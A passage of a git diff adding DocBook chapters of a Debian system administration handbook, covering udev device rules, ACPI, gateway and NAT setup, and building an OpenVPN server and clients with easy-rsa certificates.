+      <para>Let us consider the case of a simple USB key and try to assign
+      it a fixed name. First, you must find the elements that will identify
+      it in a unique manner. For this, plug it in and run <command>udevadm
+      info -a -n /dev/sdc</command> (replacing
+      <replaceable>/dev/sdc</replaceable> with the actual name assigned to
+      the key).</para>
+
+      <screen><computeroutput># </computeroutput><userinput>udevadm info -a -n /dev/sdc</userinput>
+<computeroutput>[...]
+  looking at device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0/block/sdc':
+    KERNEL=="sdc"
+    SUBSYSTEM=="block"
+    DRIVER==""
+    ATTR{range}=="16"
+    ATTR{ext_range}=="256"
+    ATTR{removable}=="1"
+    ATTR{ro}=="0"
+    ATTR{size}=="126976"
+    ATTR{alignment_offset}=="0"
+    ATTR{capability}=="53"
+    ATTR{stat}=="      51      100     1208      256        0        0        0        0        0      192      25        6"
+    ATTR{inflight}=="       0        0"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="scsi"
+    DRIVERS=="sd"
+    ATTRS{device_blocked}=="0"
+    ATTRS{type}=="0"
+    ATTRS{scsi_level}=="3"
+    ATTRS{vendor}=="I0MEGA  "
+    ATTRS{model}=="UMni64MB*IOM2C4 "
+    ATTRS{rev}=="    "
+    ATTRS{state}=="running"
+[...]
+    ATTRS{max_sectors}=="240"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="usb"
+    DRIVERS=="usb"
+    ATTRS{configuration}=="iCfg"
+    ATTRS{bNumInterfaces}==" 1"
+    ATTRS{bConfigurationValue}=="1"
+    ATTRS{bmAttributes}=="80"
+    ATTRS{bMaxPower}=="100mA"
+    ATTRS{urbnum}=="398"
+    ATTRS{idVendor}=="4146"
+    ATTRS{idProduct}=="4146"
+    ATTRS{bcdDevice}=="0100"
+[...]
+    ATTRS{manufacturer}=="USB Disk"
+    ATTRS{product}=="USB Mass Storage Device"
+    ATTRS{serial}=="M004021000001"
+[...]
+</computeroutput>
+</screen>
+
+      <para>To create a new rule, you can use tests on the device's
+      variables, as well as those of one of the parent devices. The above
+      case allows us to create two rules like these:</para>
+
+      <programlisting>KERNEL=="sd?", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/disk"
+KERNEL=="sd?[0-9]", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/part%n"
+</programlisting>
+
+      <para>Once these rules are set in a file, named for example
+      <filename>/etc/udev/rules.d/010_local.rules</filename>, you can
+      simply remove and reconnect the USB key. You can then see that
+      <filename>/dev/usb_key/disk</filename> represents the disk associated
+      with the USB key, and <filename>/dev/usb_key/part1</filename> is its
+      first partition.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Debugging <emphasis>udev</emphasis>'s configuration</title>
+
+	<para>Like many daemons, <command>udevd</command> stores logs in
+	<filename>/var/log/daemon.log</filename>. But it is not very
+	verbose by default, and it is usually not enough to understand
+	what is happening. The <command>udevadm control
+	--log-priority=info</command> command increases the verbosity level
+	and solves this problem. <command>udevadm control
+	--log-priority=err</command> returns to the default verbosity
+	level.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.power-management">
+    <title>Power Management: Advanced Configuration and Power Interface (ACPI)</title>
+    <indexterm><primary>power management</primary></indexterm>
+    <indexterm><primary>management, power management</primary></indexterm>
+
+    <para>The topic of power management is often problematic. Indeed,
+    properly suspending the computer requires that all the computer's
+    device drivers know how to put them to standby, and that they properly
+    reconfigure the devices upon waking. Unfortunately, there are still
+    a few devices unable to sleep well under Linux, because their
+    manufacturers have not provided the required specifications.</para>
+
+    <para>Linux supports ACPI (Advanced Configuration and Power
+    Interface) — the most recent standard in power management. The
+    <emphasis role="pkg">acpid</emphasis> package provides a daemon that
+    looks for power management related events (switching between AC and
+    battery power on a laptop, etc.) and that can execute various commands
+    in response.</para>
+
+    <indexterm><primary>ACPI</primary></indexterm>
+    <indexterm><primary>Advanced Configuration and Power Interface</primary></indexterm>
+    <indexterm><primary><command>acpid</command></primary></indexterm>
+    
+    <sidebar>
+      <title><emphasis>BEWARE</emphasis> Graphics card and standby</title>
+
+      <para>The graphics card driver is often the culprit
+      when standby doesn't work properly. In that case, it is a good idea
+      to test the latest version of the X.org graphics server.</para>
+    </sidebar>
+
+    <para>After this overview of basic services common to many Unix
+    systems, we will focus on the environment of the administered machines:
+    the network. Many services are required for the network to work
+    properly. They will be discussed in the next chapter.</para>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/10_network-infrastructure.xml b/tmp/cs-CZ/xml_tmp/10_network-infrastructure.xml
new file mode 100644
index 000000000..a76827381
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/10_network-infrastructure.xml
@@ -0,0 +1,1929 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="network-infrastructure">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-network-infrastructure.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Network</keyword>
+      <keyword>Gateway</keyword>
+      <keyword>TCP/IP</keyword>
+      <keyword>IPv6</keyword>
+      <keyword>DNS</keyword>
+      <keyword>Bind</keyword>
+      <keyword>DHCP</keyword>
+      <keyword>QoS</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title id="infrastructure.title">Network Infrastructure</title>
+  <highlights>
+    <para>Linux sports the whole Unix heritage for networking, and Debian
+    provides a full set of tools to create and manage them. This chapter
+    reviews these tools.</para>
+  </highlights>
+  <section id="sect.gateway">
+    <title>Gateway</title>
+
+    <para>A gateway is a system linking several networks. This term often
+    refers to a local network's “exit point” on the mandatory path to
+    all external IP addresses. The gateway is connected to each of the
+    networks it links together, and acts as a router to convey IP packets
+    between its various interfaces.</para>
+    <indexterm><primary>gateway</primary></indexterm>
+    <indexterm><primary>network</primary><secondary>gateway</secondary></indexterm>
+    <indexterm><primary>router</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> IP packet</title>
+      <indexterm><primary>packet</primary><secondary>IP</secondary></indexterm>
+
+      <para>Most networks nowadays use the IP protocol (<emphasis>Internet
+      Protocol</emphasis>). This protocol segments the transmitted data
+      into limited-size packets. Each packet contains, in addition to its
+      payload data, a number of details required for its proper
+      routing.</para>
+    </sidebar>
+
+    <sidebar id="sidebar.tcp-udp">
+      <title><emphasis>BACK TO BASICS</emphasis> TCP/UDP</title>
+      <indexterm><primary>port</primary><secondary>TCP</secondary></indexterm>
+      <indexterm><primary>port</primary><secondary>UDP</secondary></indexterm>
+      <indexterm><primary>TCP, port</primary></indexterm>
+      <indexterm><primary>UDP, port</primary></indexterm>
+
+      <para>Many programs do not handle the individual packets themselves,
+      even though the data they transmit does travel over IP; they often
+      use TCP (<emphasis>Transmission Control Protocol</emphasis>). TCP is
+      a layer over IP allowing the establishment of connections dedicated
+      to data streams between two points. The programs then only see an
+      entry point into which data can be fed with the guarantee that the
+      same data exits without loss (and in the same sequence) at the exit
+      point at the other end of the connection. Although many kinds of
+      errors can happen in the lower layers, they are compensated by TCP:
+      lost packets are retransmitted, and packets arriving out of order
+      (for example, if they used different paths) are re-ordered
+      appropriately.</para>
+
+      <para>Another protocol relying on IP is UDP (<emphasis>User Datagram
+      Protocol</emphasis>). In contrast to TCP, it is packet-oriented. Its
+      goals are different: the purpose of UDP is only to transmit one
+      packet from an application to another. The protocol does not try to
+      compensate for possible packet loss on the way, nor does it ensure
+      that packets are received in the same order as were sent. The main
+      advantage to this protocol is that the latency is greatly improved,
+      since the loss of a single packet does not delay the receiving of all
+      following packets until the lost one is retransmitted.</para>
+
+      <para>TCP and UDP both involve ports, which are “extension
+      numbers” for establishing communication with a given application on
+      a machine. This concept allows keeping several different
+      communications in parallel with the same correspondent, since these
+      communications can be distinguished by the port number.</para>
+
+      <para>Some of these port numbers — standardized by the IANA
+      (<emphasis>Internet Assigned Numbers Authority</emphasis>) — are
+      “well-known” for being associated with network services. For
+      instance, TCP port 25 is generally used by the email server. <ulink type="block" url="http://www.iana.org/assignments/port-numbers" /></para>
+    </sidebar>
+
+    <para>When a local network uses a private address range (not routable
+    on the Internet), the gateway needs to implement <emphasis>address
+    masquerading</emphasis> so that the machines on the network can
+    communicate with the outside world. The masquerading operation is a
+    kind of proxy operating on the network level: each outgoing connection
+    from an internal machine is replaced with a connection from the gateway
+    itself (since the gateway does have an external, routable address), the
+    data going through the masqueraded connection is sent to the new one,
+    and the data coming back in reply is sent through to the masqueraded
+    connection to the internal machine. The gateway uses a range of
+    dedicated TCP ports for this purpose, usually with very high numbers
+    (over 60000). Each connection coming from an internal machine then
+    appears to the outside world as a connection coming from one of these
+    reserved ports.</para>
+    <indexterm><primary>masquerading</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>CULTURE</emphasis> Private address range</title>
+      <indexterm><primary>IP address</primary><secondary>private</secondary></indexterm>
+      <indexterm><primary>private IP address</primary></indexterm>
+
+      <para>RFC 1918 defines three ranges of IPv4 addresses not meant to
+      be routed on the Internet but only used in local networks. The first
+      one, <literal>10.0.0.0/8</literal> (see sidebar <xref linkend="sidebar.networking-basics" />), is a class-A range (with
+      2<superscript>24</superscript> IP addresses). The second one,
+      <literal>172.16.0.0/12</literal>, gathers 16 class-B ranges
+      (<literal>172.16.0.0/16</literal> to
+      <literal>172.31.0.0/16</literal>), each containing
+      2<superscript>16</superscript> IP addresses. Finally,
+      <literal>192.168.0.0/16</literal> is a class-B range (grouping 256
+      class-C ranges, <literal>192.168.0.0/24</literal> to
+      <literal>192.168.255.0/24</literal>, with 256 IP addresses each).
+      <ulink type="block" url="http://www.faqs.org/rfcs/rfc1918.html" /></para>
+    </sidebar>
+
+    <para>The gateway can also perform two kinds of <emphasis>network
+    address translation</emphasis> (or NAT for short). The first kind,
+    <emphasis>Destination NAT</emphasis> (DNAT) is a technique to alter the
+    destination IP address (and/or the TCP or UDP port) for a (generally)
+    incoming connection. The connection tracking mechanism also alters the
+    following packets in the same connection to ensure continuity in the
+    communication. The second kind of NAT is <emphasis>Source
+    NAT</emphasis> (SNAT), of which <emphasis>masquerading</emphasis> is a
+    particular case; SNAT alters the source IP address (and/or the TCP or
+    UDP port) of a (generally) outgoing connection. As for DNAT, all the
+    packets in the connection are appropriately handled by the connection
+    tracking mechanism. Note that NAT is only relevant for IPv4 and its
+    limited address space; in IPv6, the wide availability of addresses
+    greatly reduces the usefulness of NAT by allowing all “internal”
+    addresses to be directly routable on the Internet (this does not imply
+    that internal machines are accessible, since intermediary firewalls can
+    filter traffic).</para>
+    <indexterm><primary>NAT</primary></indexterm>
+    <indexterm><primary>Network</primary><secondary>Address Translation</secondary></indexterm>
+    <indexterm><primary>SNAT</primary></indexterm>
+    <indexterm><primary>DNAT</primary></indexterm>
+    <indexterm><primary>Destination NAT</primary></indexterm>
+    <indexterm><primary>Source NAT</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Port forwarding</title>
+      <indexterm><primary>port forwarding</primary></indexterm>
+
+      <para>A concrete application of DNAT is <emphasis>port
+      forwarding</emphasis>. Incoming connections to a given port of a
+      machine are forwarded to a port on another machine. Other solutions
+      may exist for achieving a similar effect, though, especially at the
+      application level with <command>ssh</command> (see <xref linkend="sect.ssh-port-forwarding" />) or
+      <command>redir</command>.</para>
+    </sidebar>
+
+    <para>Enough theory, let's get practical. Turning a Debian system into
+    a gateway is a simple matter of enabling the appropriate option in the
+    Linux kernel, by way of the <filename>/proc/</filename> virtual
+    filesystem:</para>
+
+    <screen>
+<computeroutput># </computeroutput><userinput>echo 1 &gt; /proc/sys/net/ipv4/conf/default/forwarding</userinput>
+</screen>
+
+    <para>This option can also be automatically enabled on boot if
+    <filename>/etc/sysctl.conf</filename> sets the
+    <literal>net.ipv4.conf.default.forwarding</literal> option to
+    <literal>1</literal>.</para>
+
+    <example id="example.sysctl.conf">
+      <title>The <filename>/etc/sysctl.conf</filename> file</title>
+
+      <programlisting>
+net.ipv4.conf.default.forwarding = 1
+net.ipv4.conf.default.rp_filter = 1
+net.ipv4.tcp_syncookies = 1
+</programlisting>
+    </example>
+
+    <para>The same effect can be obtained for IPv6 by simply replacing
+    <literal>ipv4</literal> with <literal>ipv6</literal> in the manual
+    command and using the <literal>net.ipv6.conf.all.forwarding</literal>
+    line in <filename>/etc/sysctl.conf</filename>.</para>
+
+    <para>Enabling IPv4 masquerading is a slightly more complex operation
+    that involves configuring the <emphasis>netfilter</emphasis>
+    firewall.</para>
+
+    <para>Similarly, using NAT (for IPv4) requires configuring
+    <emphasis>netfilter</emphasis>. Since the primary purpose of this
+    component is packet filtering, the details are listed in <xref linkend="security" xrefstyle="select: label quotedtitle nopage" /> (see
+    <xref linkend="sect.firewall-packet-filtering" />).</para>
+  </section>
+  <section id="sect.virtual-private-network">
+    <title>Virtual Private Network</title>
+
+    <para>A <emphasis>Virtual Private Network</emphasis> (VPN for short) is
+    a way to link two different local networks through the Internet by way
+    of a tunnel; the tunnel is usually encrypted for confidentiality. VPNs
+    are often used to integrate a remote machine within a company's local
+    network.</para>
+    <indexterm><primary>network</primary><secondary>virtual private</secondary></indexterm>
+    <indexterm><primary>VPN</primary></indexterm>
+    <indexterm><primary>virtual private network</primary></indexterm>
+
+    <para>Several tools provide this. OpenVPN is an efficient solution,
+    easy to deploy and maintain, based on SSL/TLS. Another possibility is
+    using IPsec to encrypt IP traffic between two machines; this encryption
+    is transparent, which means that applications running on these hosts
+    need not be modified to take the VPN into account. SSH can also be used
+    to provide a VPN, in addition to its more conventional features.
+    Finally, a VPN can be established using Microsoft's PPTP protocol.
+    Other solutions exist, but are beyond the focus of this book.</para>
+    <section id="sect.openvpn">
+      <title>OpenVPN</title>
+      <indexterm><primary>OpenVPN</primary></indexterm>
+
+      <para>OpenVPN is a piece of software dedicated to creating virtual
+      private networks. Its setup involves creating virtual network
+      interfaces on the VPN server and on the client(s); both
+      <literal>tun</literal> (for IP-level tunnels) and
+      <literal>tap</literal> (for Ethernet-level tunnels) interfaces are
+      supported. In practice, <literal>tun</literal> interfaces will most
+      often be used except when the VPN clients are meant to be integrated
+      into the server's local network by way of an Ethernet bridge.</para>
+
+      <para>OpenVPN relies on OpenSSL for all the SSL/TLS cryptography and
+      associated features (confidentiality, authentication, integrity,
+      non-repudiation). It can be configured either with a shared private
+      key or using X.509 certificates based on a public key infrastructure.
+      The latter configuration is strongly preferred since it allows
+      greater flexibility when faced with a growing number of roaming users
+      accessing the VPN.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> SSL and TLS</title>
+        <indexterm><primary>SSL</primary></indexterm>
+        <indexterm><primary>TLS</primary></indexterm>
+
+	<para>The SSL protocol (<emphasis>Secure Socket Layer</emphasis>)
+	was invented by Netscape to secure connections to web servers. It
+	was later standardized by IETF under the acronym TLS
+        (<emphasis>Transport Layer Security</emphasis>). Since then TLS
+        continued to evolve and nowadays SSL is deprecated due to multiple
+        design flaws that have been discovered.
+	</para>
+      </sidebar>
+      <section id="sect.easy-rsa">
+        <title>Public Key Infrastructure: <emphasis>easy-rsa</emphasis></title>
+        <indexterm><primary>PKI (Public Key Infrastructure)</primary></indexterm>
+        <indexterm><primary>Public Key Infrastructure</primary></indexterm>
+        <indexterm><primary>X.509, certificate</primary></indexterm>
+        <indexterm><primary>certificate</primary><secondary>X.509</secondary></indexterm>
+        <indexterm><primary><emphasis>easy-rsa</emphasis></primary></indexterm>
+        <indexterm><primary>RSA (algorithm)</primary></indexterm>
+        <indexterm><primary>key pair</primary></indexterm>
+
+	<para>The RSA algorithm is widely used in public-key cryptography.
+	It involves a “key pair”, comprised of a private and a public
+	key. The two keys are closely linked to each other, and their
+	mathematical properties are such that a message encrypted with the
+	public key can only be decrypted by someone knowing the private
+	key, which ensures confidentiality. In the opposite direction, a
+	message encrypted with the private key can be decrypted by anyone
+	knowing the public key, which allows authenticating the origin of a
+	message since only someone with access to the private key could
+	generate it. When associated with a digital hash function (MD5,
+	SHA1, or a more recent variant), this leads to a signature
+	mechanism that can be applied to any message.</para>
+
+	<para>However, anyone can create a key pair, store any identity on
+	it, and pretend to be the identity of their choice. One solution
+	involves the concept of a <emphasis>Certification
+	Authority</emphasis> (CA), formalized by the X.509 standard. This
+	term covers an entity that holds a trusted key pair known as a
+	<emphasis>root certificate</emphasis>. This certificate is only
+	used to sign other certificates (key pairs), after proper steps
+	have been undertaken to check the identity stored on the key pair.
+	Applications using X.509 can then check the certificates presented
+	to them, if they know about the trusted root certificates.</para>
+
+	<para>OpenVPN follows this rule. Since public CAs only emit
+	certificates in exchange for a (hefty) fee, it is also
+	possible to create a private certification authority within
+	the company.  The <emphasis role="pkg">easy-rsa</emphasis>
+	package provides tools to serve as an X.509 certification
+	infrastructure, implemented as a set of scripts using the
+	<command>openssl</command> command.</para>
+
+        <sidebar>
+          <title><emphasis>NOTE</emphasis> <emphasis>easy-rsa</emphasis> before <emphasis role="distribution">Jessie</emphasis></title>
+
+          <para>In versions of Debian up to <emphasis role="distribution">Wheezy</emphasis>,
+          <emphasis>easy-rsa</emphasis> was distributed as part of the
+          <emphasis role="pkg">openvpn</emphasis> package, and its
+          scripts were to be found under
+          <filename>/usr/share/doc/openvpn/examples/easy-rsa/2.0/</filename>.
+          Setting up a CA involved copying that directory, instead of
+          using the <command>make-cadir</command> command as documented
+          here.</para>
+        </sidebar>
+
+	<para>The Falcot Corp administrators use this tool to create
+	the required certificates, both for the server and the
+	clients. This allows the configuration of all clients to be
+	similar since they will only have to be set up so as to trust
+	certificates coming from Falcot's local CA. This CA is the
+	first certificate to create; to this end, the administrators
+	set up a directory with the files required for the CA in an
+	appropriate location, preferably on a machine not connected to
+	the network in order to mitigate the risk of the CA's private
+	key being stolen.</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>make-cadir pki-falcot
+</userinput><computeroutput>$ </computeroutput><userinput>cd pki-falcot</userinput>
+</screen>
+
+	<para>They then store the required parameters into the
+	<filename>vars</filename> file, especially those named with a
+	<literal>KEY_</literal> prefix; these variables are then integrated
+	into the environment:</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>vim vars
+</userinput><computeroutput>$ </computeroutput><userinput>grep KEY_ vars
+</userinput><computeroutput>export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA`
+export KEY_DIR="$EASY_RSA/keys"
+echo NOTE: If you run ./clean-all, I will be doing a rm -rf on $KEY_DIR
+export KEY_SIZE=2048
+export KEY_EXPIRE=3650
+export KEY_COUNTRY="FR"
+export KEY_PROVINCE="Loire"
+export KEY_CITY="Saint-Étienne"
+export KEY_ORG="Falcot Corp"
+export KEY_EMAIL="admin@falcot.com"
+export KEY_OU="Certificate authority"
+export KEY_NAME="Certificate authority for Falcot Corp"
+# If you'd like to sign all keys with the same Common Name, uncomment the KEY_CN export below
+# export KEY_CN="CommonName"
+$ </computeroutput><userinput>. ./vars
+</userinput><computeroutput>NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/roland/pki-falcot/keys
+$ </computeroutput><userinput>./clean-all
+</userinput>
+</screen>
+
+	<para>The next step is the creation of the CA's key pair itself
+	(the two parts of the key pair will be stored under
+	<filename>keys/ca.crt</filename> and
+	<filename>keys/ca.key</filename> during this step):</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>./build-ca</userinput>
+<computeroutput>Generating a 2048 bit RSA private key
+...................................................................+++
+...+++
+writing new private key to 'ca.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [Falcot Corp CA]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+</computeroutput>
+</screen>
+
+	<para>The certificate for the VPN server can now be created, as
+	well as the Diffie-Hellman parameters required for the server side
+	of an SSL/TLS connection. The VPN server is identified by its DNS
+	name <literal>vpn.falcot.com</literal>; this name is re-used for
+	the generated key files
+	(<filename>keys/vpn.falcot.com.crt</filename> for the public
+	certificate, <filename>keys/vpn.falcot.com.key</filename> for the
+	private key):</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>./build-key-server vpn.falcot.com
+</userinput><computeroutput>Generating a 2048 bit RSA private key
+.....................................................................................................................+++
+...........+++
+writing new private key to 'vpn.falcot.com.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [vpn.falcot.com]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+
+Please enter the following 'extra' attributes
+to be sent with your certificate request
+A challenge password []:
+An optional company name []:
+Using configuration from /home/roland/pki-falcot/openssl-1.0.0.cnf
+Check that the request matches the signature
+Signature ok
+The Subject's Distinguished Name is as follows
+countryName           :PRINTABLE:'FR'
+stateOrProvinceName   :PRINTABLE:'Loire'
+localityName          :T61STRING:'Saint-\0xFFFFFFC3\0xFFFFFF89tienne'
+organizationName      :PRINTABLE:'Falcot Corp'
+organizationalUnitName:PRINTABLE:'Certificate authority'
+commonName            :PRINTABLE:'vpn.falcot.com'
+name                  :PRINTABLE:'Certificate authority for Falcot Corp'
+emailAddress          :IA5STRING:'admin@falcot.com'
+Certificate is to be certified until Mar  6 14:54:56 2025 GMT (3650 days)
+Sign the certificate? [y/n]:</computeroutput><userinput>y
+</userinput><computeroutput>
+
+1 out of 1 certificate requests certified, commit? [y/n]</computeroutput><userinput>y
+</userinput><computeroutput>Write out database with 1 new entries
+Data Base Updated
+$ </computeroutput><userinput>./build-dh
+</userinput><computeroutput>Generating DH parameters, 2048 bit long safe prime, generator 2
+This is going to take a long time
+[…]
+</computeroutput>
+</screen>
+
+	<para>The following step creates certificates for the VPN clients;
+	one certificate is required for each computer or person allowed to
+	use the VPN:</para>
+
+        <screen>
+<computeroutput>$ </computeroutput><userinput>./build-key JoeSmith
+</userinput><computeroutput>Generating a 2048 bit RSA private key
+................................+++
+..............................................+++
+writing new private key to 'JoeSmith.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:</computeroutput><userinput>Development unit
+</userinput><computeroutput>Common Name (eg, your name or your server's hostname) [JoeSmith]:</computeroutput><userinput>Joe Smith
+</userinput><computeroutput>[…]</computeroutput></screen>
+
+	<para>Now all certificates have been created, they need to be
+	copied where appropriate: the root certificate's public key
+	(<filename>keys/ca.crt</filename>) will be stored on all machines
+	(both server and clients) as
+	<filename>/etc/ssl/certs/Falcot_CA.crt</filename>. The server's
+	certificate is installed only on the server
+	(<filename>keys/vpn.falcot.com.crt</filename> goes to
+	<filename>/etc/ssl/vpn.falcot.com.crt</filename>, and
+	<filename>keys/vpn.falcot.com.key</filename> goes to
+	<filename>/etc/ssl/private/vpn.falcot.com.key</filename> with
+	restricted permissions so that only the administrator can read it),
+	with the corresponding Diffie-Hellman parameters
+	(<filename>keys/dh2048.pem</filename>) installed to
+	<filename>/etc/openvpn/dh2048.pem</filename>. Client certificates
+	are installed on the corresponding VPN client in a similar
+	fashion.</para>
+      </section>
+      <section>
+        <title>Configuring the OpenVPN Server</title>
+
+	<para>By default, the OpenVPN initialization script tries starting
+	all virtual private networks defined in
+	<filename>/etc/openvpn/*.conf</filename>. Setting up a VPN server
+	is therefore a matter of storing a corresponding configuration file
+	in this directory. A good starting point is
+	<filename>/usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz</filename>,
+	which leads to a rather standard server. Of course, some parameters
+	need to be adapted: <literal>ca</literal>, <literal>cert</literal>,
+	<literal>key</literal> and <literal>dh</literal> need to describe
+	the selected locations (respectively,
+	<literal>/etc/ssl/certs/Falcot_CA.crt</literal>,
+	<literal>/etc/ssl/vpn.falcot.com.crt</literal>,
+	<literal>/etc/ssl/private/vpn.falcot.com.key</literal> and
+	<literal>/etc/openvpn/dh2048.pem</literal>). The <literal>server
+	10.8.0.0 255.255.255.0</literal> directive defines the subnet to be
+	used by the VPN; the server uses the first IP address in that range
+	(<literal>10.8.0.1</literal>) and the rest of the addresses are
+	allocated to clients.</para>
+
+	<para>With this configuration, starting OpenVPN creates the virtual
+	network interface, usually under the <literal>tun0</literal> name.
+	However, firewalls are often configured at the same time as the
+	real network interfaces, which happens before OpenVPN starts. Good
+	practice therefore recommends creating a persistent virtual network
+	interface, and configuring OpenVPN to use this pre-existing
+	interface. This further allows choosing the name for this
+	interface. To this end, <command>openvpn --mktun --dev vpn
+	--dev-type tun</command> creates a virtual network interface named
+	<literal>vpn</literal> with type <literal>tun</literal>; this
+	command can easily be integrated in the firewall configuration
+	script, or in an <literal>up</literal> directive of the
+	<filename>/etc/network/interfaces</filename> file. The OpenVPN
+	configuration file must also be updated accordingly, with the
+	<literal>dev vpn</literal> and <literal>dev-type tun</literal>
+	directives.</para>
+
+	<para>Barring further action, VPN clients can only access the VPN
+	server itself by way of the <literal>10.8.0.1</literal> address.
+	Granting the clients access to the local network (192.168.0.0/24),
+	requires adding a <literal>push route 192.168.0.0
+	255.255.255.0</literal> directive to the OpenVPN configuration so
+	that VPN clients automatically get a network route telling them
+	that this network is reachable by way of the VPN. Furthermore,
+	machines on the local network also need to be informed that the
+	route to the VPN goes through the VPN server (this automatically
+	works when the VPN server is installed on the gateway).
+	Alternatively, the VPN server can be configured to perform IP
+	masquerading so that connections coming from VPN clients appear as
+	if they are coming from the VPN server instead (see <xref linkend="sect.gateway" />).</para>
+      </section>
+      <section>
+        <title>Configuring the OpenVPN Client</title>
+
+	<para>Setting up an OpenVPN client also requires creating a
+	configuration file in <filename>/etc/openvpn/</filename>. A
+	standard configuration can be obtained by using
+	<filename>/usr/share/doc/openvpn/examples/sample-config-files/client.conf</filename>
+	as a starting point. The <literal>remote vpn.falcot.com
+	1194</literal> directive describes the address and port of the
+	OpenVPN server; the <literal>ca</literal>, <literal>cert</literal>
+	and <literal>key</literal> also need to be adapted to describe the
+	locations of the key files.</para>
+
+	<para>If the VPN should not be started automatically on boot, set
+	the <literal>AUTOSTART</literal> directive to
+	<literal>none</literal> in the
+	<filename>/etc/default/openvpn</filename> file. Starting or
+	stopping a given VPN connection is always possible with the
+        commands <command>service openvpn@<replaceable>name</replaceable> start</command> and
+        <command>service openvpn@<replaceable>name</replaceable> stop</command> (where the connection
+	<replaceable>name</replaceable> matches the one defined in
+	<filename>/etc/openvpn/<replaceable>name</replaceable>.conf</filename>).</para>
+
+	<para>The <emphasis role="pkg">network-manager-openvpn-gnome</emphasis> package
+	contains an extension to Network Manager (see <xref linkend="sect.roaming-network-config" />) that allows managing
+	OpenVPN virtual private networks. This allows every user to
+	configure OpenVPN connections graphically and to control them from
+	the network management icon. <indexterm><primary><emphasis role="pkg">network-manager-openvpn-gnome</emphasis></primary></indexterm></para>
+      </section>
+    </section>
+    <section id="sect.ssh-vpn">
+      <title>Virtual Private Network with SSH</title>
+      <indexterm><primary>SSH</primary></indexterm>
+      <indexterm><primary>PPP</primary></indexterm>
+
+      <para>There are actually two ways of creating a virtual private
+      network with SSH. The historic one involves establishing a PPP layer
+      over the SSH link. This method is described in a HOWTO document:
+      <ulink type="block" url="http://www.tldp.org/HOWTO/ppp-ssh/" /></para>
+
+      <para>The second method is more recent, and was introduced with
+      OpenSSH 4.3; it is now possible for OpenSSH to create virtual
+      network interfaces (<literal>tun*</literal>) on both sides of an SSH
+      connection, and these virtual interfaces can be configured exactly as
+      if they were physical interfaces. The tunneling system must first be
+      enabled by setting <literal>PermitTunnel</literal> to “yes” in
+      the SSH server configuration file
+      (<filename>/etc/ssh/sshd_config</filename>). When establishing the
+      SSH connection, the creation of a tunnel must be explicitly requested
+      with the <literal>-w any:any</literal> option (<literal>any</literal>
+      can be replaced with the desired <literal>tun</literal> device
+      number). This requires the user to have administrator privilege on
+      both sides, so as to be able to create the network device (in other
+      words, the connection must be established as root).</para>
+
+      <para>Both methods for creating a virtual private network over SSH
+      are quite straightforward. However, the VPN they provide is not the
+      most efficient available; in particular, it does not handle high
+      levels of traffic very well.</para>
+
+      <para>The explanation is that when a TCP/IP stack is encapsulated
+      within a TCP/IP connection (for SSH), the TCP protocol is used twice,
+      once for the SSH connection and once within the tunnel. This
+      leads to problems, especially due to the way TCP adapts to network
